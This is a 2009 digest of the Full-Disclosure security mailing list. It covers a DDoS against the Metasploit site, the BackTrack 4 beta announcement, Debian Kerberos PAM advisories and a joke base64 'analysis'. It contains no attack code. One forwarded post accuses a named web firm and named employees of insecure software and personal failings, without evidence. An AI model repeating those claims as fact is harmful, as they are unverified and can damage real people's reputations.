References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com>
Message-ID: <4992EC16.5090802@csuohio.edu>

> .org is now being affected as well.
>

Not here ..

$ date
Wed Feb 11 10:17:01 EST 2009

$ host metasploit.org
metasploit.org has address 66.240.213.84
metasploit.org mail is handled by 20 slug.metasploit.com.
metasploit.org mail is handled by 1 bogus.metasploit.com.
metasploit.org mail is handled by 30 core.metasploit.com.

$ host metasploit.com
metasploit.com has address 66.240.213.81
metasploit.com mail is handled by 30 core.metasploit.com.
metasploit.com mail is handled by 20 slug.metasploit.com.
metasploit.com mail is handled by 1 bogus.metasploit.com.

From Dirk.Reimers at gmx.de Wed Feb 11 15:21:28 2009
From: Dirk.Reimers at gmx.de (Dirk Reimers)
Date: Wed, 11 Feb 2009 16:21:28 +0100
Subject: [Full-disclosure] (no subject)
Message-ID: <20090211152128.215040@gmx.net>

> .org is now being affected as well.

References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu>
Message-ID: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com>

that's all fine and dandy. still can't reach port 80.

On Wed, Feb 11, 2009 at 10:17 AM, Michael Holstein wrote:
>
>> .org is now being affected as well.
>>
>
> Not here ..
>
> $ date
> Wed Feb 11 10:17:01 EST 2009
>
> $ host metasploit.org
> metasploit.org has address 66.240.213.84
> metasploit.org mail is handled by 20 slug.metasploit.com.
> metasploit.org mail is handled by 1 bogus.metasploit.com.
> metasploit.org mail is handled by 30 core.metasploit.com.
>
> $ host metasploit.com
> metasploit.com has address 66.240.213.81
> metasploit.com mail is handled by 30 core.metasploit.com.
> metasploit.com mail is handled by 20 slug.metasploit.com.
> metasploit.com mail is handled by 1 bogus.metasploit.com.
>

From michael.holstein at csuohio.edu Wed Feb 11 15:54:10 2009
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Wed, 11 Feb 2009 10:54:10 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com>
Message-ID: <4992F4A2.5020201@csuohio.edu>

> that's all fine and dandy. still can't reach port 80.
>

Again .. not here (AS32818 in Cleveland, OH) ..

~$ wget -O - http://www.metasploit.org
--10:52:43-- http://www.metasploit.org/
=> `-'
Resolving www.metasploit.org... 66.240.213.84
Connecting to www.metasploit.org|66.240.213.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,157 (8.0K) [text/html]

0% [ ] 0 --.--K/s
The Metasploit Project
...

From michael.holstein at csuohio.edu Wed Feb 11 16:00:40 2009
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Wed, 11 Feb 2009 11:00:40 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com>
Message-ID: <4992F628.5090500@csuohio.edu>

> that's all fine and dandy. still can't reach port 80.
>

Have you tried using OpenDNS, etc. to see if it resolves?

eg: host -t a www.metasploit.org 208.67.222.222

Perhaps your school/employer/ISP has decided that Metasploit is off-limits.

~Mike.

From staticrez at gmail.com Wed Feb 11 16:05:08 2009
From: staticrez at gmail.com (sr.)
Date: Wed, 11 Feb 2009 11:05:08 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <4992F628.5090500@csuohio.edu>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> <4992F628.5090500@csuohio.edu>
Message-ID: <5d80962a0902110805x1924179s7062d71836918912@mail.gmail.com>

Well, i can resolve the IP's just fine. just can't connect to port 80.
I'm the fw / network person at my job, and i don't remember adding a
rule for this :-P

I can get there just fine now, seemed inaccessible to me for a short time.

thx all...

fabrizio

On Wed, Feb 11, 2009 at 11:00 AM, Michael Holstein wrote:
>
>> that's all fine and dandy. still can't reach port 80.
>>
>
> Have you tried using OpenDNS, etc. to see if it resolves?
>
> eg: host -t a www.metasploit.org 208.67.222.222
>
> Perhaps your school/employer/ISP has decided that Metasploit is off-limits.
>
> ~Mike.
>

From 0xjbrown41 at gmail.com Wed Feb 11 16:33:32 2009
From: 0xjbrown41 at gmail.com (Jeremy Brown)
Date: Wed, 11 Feb 2009 11:33:32 -0500
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: <5d80962a0902110805x1924179s7062d71836918912@mail.gmail.com>
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> <4992F628.5090500@csuohio.edu> <5d80962a0902110805x1924179s7062d71836918912@mail.gmail.com>
Message-ID:

balliwicked2

On Wed, Feb 11, 2009 at 11:05 AM, sr. wrote:
> Well, i can resolve the IP's just fine. just can't connect to port 80.
> I'm the fw / network person at my job, and i don't remember adding a
> rule for this :-P
>
> I can get there just fine now, seemed inaccessible to me for a short time.
>
> thx all...
>
> fabrizio
>
> On Wed, Feb 11, 2009 at 11:00 AM, Michael Holstein wrote:
>>
>>> that's all fine and dandy. still can't reach port 80.
>>>
>>
>> Have you tried using OpenDNS, etc. to see if it resolves?
>>
>> eg: host -t a www.metasploit.org 208.67.222.222
>>
>> Perhaps your school/employer/ISP has decided that Metasploit is off-limits.
>>
>> ~Mike.
>>

From el8 at hushmail.com Wed Feb 11 17:01:48 2009
From: el8 at hushmail.com (el8 at hushmail.com)
Date: Wed, 11 Feb 2009 12:01:48 -0500
Subject: [Full-disclosure] Fuzzing for Fun and Profit
Message-ID: <20090211170148.A4B76158045@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear tal0n.

when will you do something that hasn't been done and is even relevant or practical in 2009? fuzzing sftp and command line arguments/env variables... nice and 2000AD "oh but its setuid(0)" yeah on your box and the 5 other people who download it to write useless papers/exploits to feel like they are smart/doing something (hi prdelka). When is the last time a sftpd exploit was useful?

From el8 at hushmail.com Wed Feb 11 16:42:06 2009
From: el8 at hushmail.com (el8 at hushmail.com)
Date: Wed, 11 Feb 2009 11:42:06 -0500
Subject: [Full-disclosure] connect back PHP hack
Message-ID: <20090211164206.9ACEF158045@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

My server was recently computer hacked and I found this in one of the left over files:

Can an expert tell me what it is please?

From JLehman at mail.esignal.com Wed Feb 11 16:51:36 2009
From: JLehman at mail.esignal.com (Lehman, Jim)
Date: Wed, 11 Feb 2009 08:51:36 -0800
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To:
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com> <5d80962a0902110700ge9afa85sef33f31cdd2751ef@mail.gmail.com> <4992EC16.5090802@csuohio.edu> <5d80962a0902110740r5ccded58n217b9c719e4645a0@mail.gmail.com> <4992F628.5090500@csuohio.edu> <5d80962a0902110805x1924179s7062d71836918912@mail.gmail.com>
Message-ID:

The incoming connection rate has exceeded 15Mbps of just SYN packets, so we decided to point www.metasploit.com and metasploit.com back to 127.0.0.1 for a little while. This is more to keep our ISP happy than any fear of bandwidth charges. We ran a packet capture of the incoming SYN traffic for about 8 hours; it takes up approximately 60Gb of disk space.

In the meantime, if you want to access the Metasploit web site, please use: http://metasploit.org

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jeremy Brown
Sent: Wednesday, February 11, 2009 8:34 AM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] metasploit.com = 127.0.0.1

balliwicked2

On Wed, Feb 11, 2009 at 11:05 AM, sr. wrote:
> Well, i can resolve the IP's just fine. just can't connect to port 80.
> I'm the fw / network person at my job, and i don't remember adding a
> rule for this :-P
>
> I can get there just fine now, seemed inaccessible to me for a short time.
>
> thx all...
>
> fabrizio
>
> On Wed, Feb 11, 2009 at 11:00 AM, Michael Holstein wrote:
>>
>>> that's all fine and dandy. still can't reach port 80.
>>>
>>
>> Have you tried using OpenDNS, etc. to see if it resolves?
>>
>> eg: host -t a www.metasploit.org 208.67.222.222
>>
>> Perhaps your school/employer/ISP has decided that Metasploit is off-limits.
>>
>> ~Mike.
>>

DISCLAIMER: This message (including any files transmitted with it) may contain confidential and/or proprietary information, is the property of Interactive Data Corporation and/or its subsidiaries and is directed only to the addressee(s). If you are not the designated recipient or have reason to believe you received this message in error, please delete this message from your system and notify the sender immediately. An unintended recipient's disclosure, copying, distribution or use of this message, or any attachments, is prohibited and may be unlawful.

From tbiehn at gmail.com Wed Feb 11 17:51:54 2009
From: tbiehn at gmail.com (T Biehn)
Date: Wed, 11 Feb 2009 12:51:54 -0500
Subject: [Full-disclosure] Fuzzing for Fun and Profit
In-Reply-To: <20090211170148.A4B76158045@smtp.hushmail.com>
References: <20090211170148.A4B76158045@smtp.hushmail.com>
Message-ID: <2d6724810902110951i5e7d459di7c8ef22863be0f22@mail.gmail.com>

release something that fuzzes web services given a WSDL.

OR

* Grammar file.
state awareness given history, state munging, branch on prior states.

Like:
A->B->C->D Transaction 1
A1->B1->C1 Transaction 2
REPLAY from B1
B1->C2->D2 Transaction 1
C1->D1
OR
A3->D3
D3->A3 (Send init packet with mundgery permute over *States if it permits.)

Run all permutations and branches from all steps, with all possible delays. Learn if it "supports" your test then drop your test if it doesn't work.

You won't worry about running out of shit to test, and you'll finally justify the cost of some sweet new hardware to run this on.

-or-

Learn how to audit code? This might be too much CS for you, but if you plug away you might learn something :.)

I'm sure you'll get a talking spot and mad whitehat dollars if you do.

On Wed, Feb 11, 2009 at 12:01 PM, wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Dear tal0n.
>
> when will you do something that hasn't been done and is even
> relevant or practical in 2009? fuzzing sftp and command line
> arguments/env variables... nice and 2000AD "oh but its setuid(0)"
> yeah on your box and the 5 other people who download it to write
> useless papers/exploits to feel like they are smart/doing something
> (hi prdelka). When is the last time a sftpd exploit was useful?
From muts at offensive-security.com Wed Feb 11 16:37:37 2009
From: muts at offensive-security.com (Mati Aharoni)
Date: Wed, 11 Feb 2009 11:37:37 -0500
Subject: [Full-disclosure] BackTrack 4 Beta Released
Message-ID: <8b0e09fc0902110837k70e83f9bqa514e19465347a03@mail.gmail.com>

The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. We have taken huge conceptual leaps with BackTrack 4, and have some new and exciting features. The most significant of these changes is our expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution".

Now based on Debian core packages and utilizing the Ubuntu software repositories, BackTrack 4 can be upgraded in case of update. When syncing with our BackTrack repositories, you will regularly get security tool updates soon after they are released.

Some of the new features include:

* Kernel 2.6.28.1 with better hardware support.
* Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
* Support for PXE Boot - Boot BackTrack over the network with PXE supported cards!
* SAINT EXPLOIT - kindly provided by SAINT corporation for our users with a limited number of free IPs.
* MALTEGO - The guys over at Paterva did outstanding work with Maltego 2.0.2 - which is featured in BackTrack as a community edition.
* The latest mac80211 wireless injection patches are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
* Unicornscan - Fully functional with postgres logging support and a web front end.
* RFID support
* Pyrit CUDA support...
* New and updated tools - the list is endless!

With all these changes, PLUS the usual goodies and surprises we have in BackTrack, we are truly excited about this new release. We consider the Beta to be stable and usable. Some tools were kept back from this version, and will be soon added to the repositories.
Downloads can be found here: http://www.remote-exploit.org/backtrack_download.html

Keep safe,
The Remote Exploit Team

From jmm at debian.org Wed Feb 11 20:58:04 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Wed, 11 Feb 2009 21:58:04 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1721-1] New libpam-krb5 packages fix local privilege escalation
Message-ID: <20090211205803.GA4136@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-1721-1                  security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
February 11, 2009                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : libpam-krb5
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-0360 CVE-2009-0361

Several local vulnerabilities have been discovered in the PAM module for MIT Kerberos. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-0360

Russ Allbery discovered that the Kerberos PAM module parsed configuration settings from environment variables when run from a setuid context. This could lead to local privilege escalation if an attacker points a setuid program using PAM authentication to a Kerberos setup under her control.

CVE-2009-0361

Derek Chan discovered that the Kerberos PAM module allows reinitialisation of user credentials when run from a setuid context, resulting in potential local denial of service by overwriting the credential cache file or to privilege escalation.

For the stable distribution (etch), these problems have been fixed in version 2.6-1etch1.

For the upcoming stable distribution (lenny), these problems have been fixed in version 3.11-4.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your libpam-krb5 package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:
These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From jmm at debian.org Wed Feb 11 21:04:35 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Wed, 11 Feb 2009 22:04:35 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1722-1] New libpam-heimdal packages fix local privilege escalation
Message-ID: <20090211210435.GA4248@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1722-1                  security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
February 11, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libpam-heimdal
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-0361

Derek Chan discovered that the PAM module for the Heimdal Kerberos
implementation allows reinitialisation of user credentials when run
from a setuid context. This can result in a local denial of service
(by overwriting the credential cache file) or in local privilege
escalation.

For the stable distribution (etch), this problem has been fixed in
version 2.5-1etch1.

For the upcoming stable distribution (lenny), this problem has been
fixed in version 3.10-2.1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your libpam-heimdal package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1.dsc
    Size/MD5 checksum:      699 09e39eb1552950761fdcc51babceef11
  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1.diff.gz
    Size/MD5 checksum:     8208 3e178b9617aadc2e030c07fec659330c
  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5.orig.tar.gz
    Size/MD5 checksum:   117834 a80c66fcf0c48608abfb5ff0c443ab94

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_amd64.deb
    Size/MD5 checksum:    38348 a9b7ddbb56515616567b46ead7d48213

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_arm.deb
    Size/MD5 checksum:    36226 bdfaa1037d3b02494f28d2da628e038f

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_hppa.deb
    Size/MD5 checksum:    39432 f721ac5acbaeb33f26c6387ccc4e73da

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_i386.deb
    Size/MD5 checksum:    37652 c1b56b35fb35c0d700de6ea53d753a4e

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_ia64.deb
    Size/MD5 checksum:    43594 2238be62f72a01bbac329d2b5dc0bbe4

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_mips.deb
    Size/MD5 checksum:    37544 80164efa305002d37aeb9c67b1a41f09

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_mipsel.deb
    Size/MD5 checksum:    37534 7d911ce54e2e8f078f117984ffbe4b97

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_powerpc.deb
    Size/MD5 checksum:    39256 076218cc619f405bb07016ecb2eeaef6

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_s390.deb
    Size/MD5 checksum:    38826 be7ee31cad3f876e7f2a343d8cf9f413

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/libp/libpam-heimdal/libpam-heimdal_2.5-1etch1_sparc.deb
    Size/MD5 checksum:    37166 bc2d46af607a9acd7978f6973cdc5ecf


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkmTPPMACgkQXm3vHE4uylpNrQCgubliWx2XLOuiece2KpczkcsC
FEwAn1OXJGgjyV3dIyGX6opMEM5nwfrc
=k2FA
-----END PGP SIGNATURE-----

From angrycustomer at hushmail.com Wed Feb 11 20:44:19 2009
From: angrycustomer at hushmail.com (angrycustomer at hushmail.com)
Date: Wed, 11 Feb 2009 15:44:19 -0500
Subject: [Full-disclosure] Cambiumgroup customers get hacked fast!
Message-ID: <20090211204419.AD49328042@smtp.hushmail.com>

Thought this might be the place to send this. We were using the content system that cambiumgroup created and it resulted in me losing my job because my employer got hacked. When I googled them I found this posting in google's cache.

http://74.125.47.132/search?q=cache:PtwMBLcvxxsJ:www.vermontinternetdesign.com/index.php%3Ftopic%3D597.0+cambiumgroup+Vulnerabilities&hl=en&ct=clnk&cd=3&gl=us&client=safari

Hello everyone. I would like to share this post with everyone here on my site. I would like to talk about the safety of your email accounts and what is being done to protect them, and why it's important that the owner of a web development company understands what they are doing.

Well, email accounts are probably the most vulnerable part of any web server, simply because email accounts are typically the most beneficial to someone who is trying to breach your web server. It is profitable for a hacker to breach an email account. Why? Well, why is it profitable for you to do an email blast? The same reason it is for a hacker to do one.

I was working for a company in St. Johnsbury, Vermont (Cambium Group LLC) for a couple of months. I was hired to do a backlog of projects that the lead developer obviously wasn't capable of doing. While I was working at this place I noticed that someone had unauthorized access to the company's internal web servers. I mentioned to the owner of the company that someone had unauthorized access to the web server. He thought that I was crazy, that someone could have possibly done that. I simply couldn't sleep at night. I checked the web server and found they were using a website monitoring service that had been hacked into, meaning there was a program that they used that accessed all of the client web servers from their development server.

Upon talking to the owner and secretary of this company, I learned that neither the owner of Cambium Group nor the sales lady would admit that there was a problem. They were more worried about protecting a reputation than securing a web server. After this incident I decided to do a further investigation. Upon closing my investigation I learned that the people that I was working for were selling a very unsecured content management system to credit unions. They had told me they wanted me to protect their clients' accounts and websites. However, when I mentioned that there were a lot of security holes they didn't want to take action to protect their customers. They simply did not care.

I would like to make everyone aware of all of the problems that I found when working with http://www.cambiumgroup.com .

1) I found that all of their web servers use the same configuration. Big no-no when you are working with banks.
2) I found that large volumes of spam were being sent from company and customer email accounts. Many customers were complaining that emails were being sent that they never sent.
3) I found that adding malformed URLs to their content management system will allow a remote user to run MySQL queries directly on their database.
4) I found that the admin password is the same on 100 websites.
5) I found that the content management system was vulnerable to both HTML injection and SQL injection.
6) I found that their lead developer Jason Leno only knows basic programming skills and denies that someone would be able to cause a problem due to the above issues.
7) I found that the web forms they were using on their content management system would allow someone to send an email to a mailing list.
8) I found that Scott Wells and Shari Choinard had no interest in protecting their customers from the above issues.
9) I found out that they were charging $20,000 - $50,000 for an application that opens up the clients to the above vulnerabilities.
10) After working at this company for 2 months I learned that the secretary Shari and Scott Wells live together and neither one of them knows anything about computer programming.

I am putting this posting here so as to protect the customers of that company. I know they are paying a lot of money for what they got, and for the amount of money they are charged they should not be opened up to these security problems.

From erc at pobox.com Wed Feb 11 21:26:05 2009
From: erc at pobox.com (Ed Carp)
Date: Wed, 11 Feb 2009 13:26:05 -0800
Subject: [Full-disclosure] Cambiumgroup customers get hacked fast!
In-Reply-To: <20090211204419.AD49328042@smtp.hushmail.com>
References: <20090211204419.AD49328042@smtp.hushmail.com>
Message-ID: <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com>

It's really hard to take someone seriously who can't even spell or produce something even close to grammatically correct English.

From lukasz at bromirski.net Wed Feb 11 23:36:26 2009
From: lukasz at bromirski.net (Łukasz Bromirski)
Date: Thu, 12 Feb 2009 00:36:26 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1721-1] New libpam-krb5 packages fix local privilege escalation
In-Reply-To: <20090211205803.GA4136@galadriel.inutil.org>
References: <20090211205803.GA4136@galadriel.inutil.org>
Message-ID: <499360FA.3080200@bromirski.net>

On 2009-02-11 22:08, Justin Shore wrote:
> I set 'ip tcp path-mtu-discovery' on all my boxes by default, and the
> vast majority of them still assumed 516 or 536 MSS.

Then something is messing up PMTUD.

-- 
"Don't expect me to cry for all the      | Łukasz Bromirski
 reasons you had to die" -- Kurt Cobain  | http://lukasz.bromirski.net

From nabu at absolom.ro Thu Feb 12 00:44:54 2009
From: nabu at absolom.ro (Elite Nabukadnezar)
Date: Thu, 12 Feb 2009 02:44:54 +0200
Subject: [Full-disclosure] Cambiumgroup customers get hacked fast!
In-Reply-To: <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com>
References: <20090211204419.AD49328042@smtp.hushmail.com> <1b0d006c0902111326v322a32a4x3f6b1f0823b4ad2f@mail.gmail.com>
Message-ID: 

Wow, can you be more ignorant? So if someone is born in, let's say, Romania, and English is not his first language, will that mean his opinions can't be taken seriously when he misspells?

----- Original Message -----
From: Ed Carp
To: full-disclosure at lists.grok.org.uk
Sent: Wednesday, February 11, 2009 11:26 PM
Subject: Re: [Full-disclosure] Cambiumgroup customers get hacked fast!

It's really hard to take someone seriously who can't even spell or produce something even close to grammatically correct English.

------------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From prb at lava.net Thu Feb 12 01:46:06 2009
From: prb at lava.net (Peter Besenbruch)
Date: Wed, 11 Feb 2009 15:46:06 -1000
Subject: [Full-disclosure] metasploit.com = 127.0.0.1
In-Reply-To: 
References: <5d80962a0902101405v584229a8pfdcf44caef1b86ac@mail.gmail.com>
Message-ID: <200902111546.07085.prb@lava.net>

On Wednesday 11 February 2009 06:51:36 Lehman, Jim wrote:
> The incoming connection rate has exceeded 15Mbps of just SYN packets, so
> we decided to point www.metasploit.com and metasploit.com back to
> 127.0.0.1 for a little while. This is more to keep our ISP happy than
> any fear of bandwidth charges. We ran a packet capture of the incoming
> SYN traffic for about 8 hours; it takes up approximately 60Gb of disk
> space. In the meantime, if you want to access the Metasploit web site,
> please use: http://metasploit.org

Also from the Metasploit site:

Feb-09-2009 Pathetic DDoS vs Metasploit (round 2) (hdm)

It looks like our little DDoS buddy got sent home from school early today -- the flood started up again, this time ignoring the DNS name for the metasploit.com web site and instead targeting both IP addresses configured on the server. While SSL service is still unaffected (including Online Update over SVN), folks who wish to visit the Metasploit web site will need to do so using an alternate port until we roll out the next countermeasure.

http://metasploit.com:8000/

We also host the main web server for Attack Research, which can now be accessed at:

http://www.attackresearch.com:8000/

Thanks for your patience,

Feb-08-2009 Pathetic DDoS vs Security Sites (hdm)

On Friday, starting around 9:00pm CST, the main metasploit.com was hit with a highly-annoying, if pretty useless distributed denial of service. The attack consisted of a botnet-sourced connection flood against port 80 for the metasploit.com host name. This flood consisted of about 80,000 connections per second, all from real hosts trying to send a simple HTTP request. At the same time, Packet Storm and Milw0rm were being hit as well.

About 95% of the bots would intermittently resolve metasploit.com and follow the target address with the connection flood. The other 5% continued to bang on the main metasploit.com IP address and port even after the host record was changed. Solving this involved parking the metasploit.com host record at 127.0.0.1 and moving the other host names and services to a spare IP address. This allows for www.metasploit.com and most of our other domains and services to work properly. The only drawback is that until the flooding stops, we can't use the metasploit.com A record, which happens to be the default for updating the Metasploit Framework installation. A fun side effect is that they handed us full control of the DDoS stream: we can point the metasploit.com record anywhere we like and the connection flood will follow it.

We will continue to find other ways to mitigate the flood; but until we can safely use the metasploit.com name again, our standard online update mechanism is going to fail. If you are trying to check out a fresh copy of Metasploit from subversion, use the https://www.metasploit.com/svn/framework3/ URL for now.

As of 9:30am CST, the Immunity web site is being hit as well. If anyone has information on the folks involved, we would love to hear from you :-)

-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From angrycustomer at hushmail.com Thu Feb 12 02:00:56 2009
From: angrycustomer at hushmail.com (angrycustomer at hushmail.com)
Date: Wed, 11 Feb 2009 21:00:56 -0500
Subject: [Full-disclosure] Cambiumgroup customers get hacked fast!
Message-ID: <20090212020056.3B0C01A003A@smtp.hushmail.com>

Ed, click on the link that I provided to you. That will show you who the author was. You do know how to click a link, right?

On Wed, 11 Feb 2009 16:26:05 -0500 Ed Carp wrote:
> It's really hard to take someone seriously who can't even spell or
> produce something even close to grammatically correct English.

From fdiggle at gmail.com Thu Feb 12 06:52:40 2009
From: fdiggle at gmail.com (Fredrick Diggle)
Date: Thu, 12 Feb 2009 00:52:40 -0600
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: 

Fredrick Diggle Security has taken it upon itself to reverse this highly mystical encryption schema and has employed its crack cryptanalysis experts and reverse engineers, including the highly acclaimed Mustache, to get answers to your questions. The team has spent a restless 48 hours reverse engineering this schema and presents the following formal analysis to the cryptographic community at large.

1. High Level Overview

A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.)

The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the encrypted alphabet.

Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string.

                    Table 1: Alphabetic Substitution

     Value Encoding  Value Encoding  Value Encoding  Value Encoding
         0 A            17 R            34 i            51 z
         1 B            18 S            35 j            52 0
         2 C            19 T            36 k            53 1
         3 D            20 U            37 l            54 2
         4 E            21 V            38 m            55 3
         5 F            22 W            39 n            56 4
         6 G            23 X            40 o            57 5
         7 H            24 Y            41 p            58 6
         8 I            25 Z            42 q            59 7
         9 J            26 a            43 r            60 8
        10 K            27 b            44 s            61 9
        11 L            28 c            45 t            62 +
        12 M            29 d            46 u            63 /
        13 N            30 e            47 v
        14 O            31 f            48 w         (pad) =
        15 P            32 g            49 x
        16 Q            33 h            50 y

Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character. Since all encrypted input is an integral number of octets, only the following cases can arise:

